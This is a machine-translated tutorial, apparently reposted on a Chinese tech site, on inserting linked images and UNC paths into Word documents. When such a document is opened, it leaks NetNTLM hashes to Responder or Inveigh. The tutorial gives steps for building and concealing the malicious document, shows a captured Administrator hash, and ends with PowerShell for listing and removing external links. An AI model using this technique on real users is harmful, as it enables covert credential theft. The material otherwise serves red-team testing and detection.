Shulou(Shulou.com)05/31 Report--

How to use image links in Microsoft Word for UNC path injection penetration, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

We all know that Word documents are often used by hackers to carry out all kinds of intrusions. In Web application penetration and red team competitions, Word documents can also be used to grab NetNTLM hashes or to prove lax network exit filtering and other problems. Not long ago, netbiosX posted an article on his blog about crawling NetNTLM hashes through frameset. The core idea of this article is the same as this article, but in a different way: insert the picture through a link.

The following tools will be used:

Burp Suite Pro (collaborator client)

Inveigh

Responder (grab hash)

7zip (extract document files)

Image link

Let's first open the insert tab on the menu bar and click the Picture icon. The Explorer window pops up. Enter our malicious URL in the file name field and click the "insert" drop-down menu to select "Link to File". So we successfully inserted a link to burp collaborator.

If your malicious document is for red teams or social engineering projects, you can also use the Layout option to resize the image to improve its concealment.

Make sure that you have saved your changes to the document. Now whenever you open this document, Microsoft Word tries to resolve the image links in the document. These requests will be logged in the Burp Collaborator client.

Grabbing NetNTLM Hash by UNC path injection

Again, the method we use here is the same as netbiosX, using 7zip to extract the files contained in the Word document. The file we want to modify is document.xml.rels under\ your_word_doc.docx\ word\ _ rels\. This file contains a series of interrelated targets, and all we need to do is set the relevant target value to the UNC path of the listening host.

Save the file and copy it to the word document using 7zip.

Once the user opens the Word document, Inveigh or Responder will capture the incoming authentication request.

PS C:\ > Invoke-Inveigh-NBNS N-LLMNR N-ConsoleOutput Y-IP 192.168.0.2 Inveigh 1.3.1 started at 2017-12-19T17:22:26 Elevated Privilege Mode = Enabled WARNING: Windows Firewall = Enabled Primary IP Address = 192.168.0.2 LLMNR Spoofer = Disabled mDNS Spoofer = Disabled NBNS Spoofer = Disabled SMB Capture = Enabled WARNING: HTTP Capture Disabled Due To In Use Port 80 HTTPS Capture = Disabled Machine Account Capture = Disabled Real Time ConsoleOutput = Enabled Real Time File Output = Disabled WARNING: Run Stop-Inveigh to Stop Inveigh Press any key to stop real time console output 2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3 (DESKTOP-2QRDJR2): Administrator::DESKTOP-2QRDJR2:57 [TRUNCATED] cb: 091 [truncated] 5BC: 010 [truncated] 02E0032002E00310038003200000000000000000000000000

One of the main points of this method is that it is very concealed. Once the document is opened, a request is made without showing or reminding the user of a possible malicious URL or UNC path.

Use PowerShell to enumerate associated targets

The method used above is simple, but very effective because we take advantage of the trusted features in Microsoft Office. Next, I'll introduce two simple ways to enumerate associated targets, and 7zip will not be used here. Of course, there are many excellent forensics tools that can accomplish these tasks, such as Yara.

The Word.Application COM object can be used to access the contents of an Word document. This can be done with a few simple commands. The WordOpenXML property contains the associations in the document.

$file = "C:\ path\ to\ doc.docx" $word = New-Object-ComObject Word.Application$doc = $word.documents.open ($file) $xml = New-Object System.XML.XMLDocument$xml = $doc.WordOpenXML$targets = $xml.package.part.xmlData.Relationships.Relationship$targets | Format-Table$word.Quit ()

This will successfully enumerate all associated targets in the document. The problem here is that when the Word.Application COM object is used, the Word process is started and the URL/UNC path is parsed.

To avoid this, we can use the DocumentFormat.OpenXML library and enumerate all external associations in the document. This method was used in the test and no collaborator or authentication requests were captured.

[System.Reflection.Assembly]:: LoadFrom ("C:\ DocumentFormat.OpenXml.dll") $file = "C:\ path\ to\ doc.docx" $doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]:: Open ($file,$true) $targets = $doc.MainDocumentPart.ExternalRelationships$targets$doc.Close ()

Further, the DeleteExternalRelationship method removes the relationship with the external id by providing the associated URL.

Doc.MainDocumentPart.DeleteExternalRelationship ("rId4") on how to use image links in Microsoft Word for UNC path injection infiltration questions are shared here, I hope the above content can be of some help to you, if you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.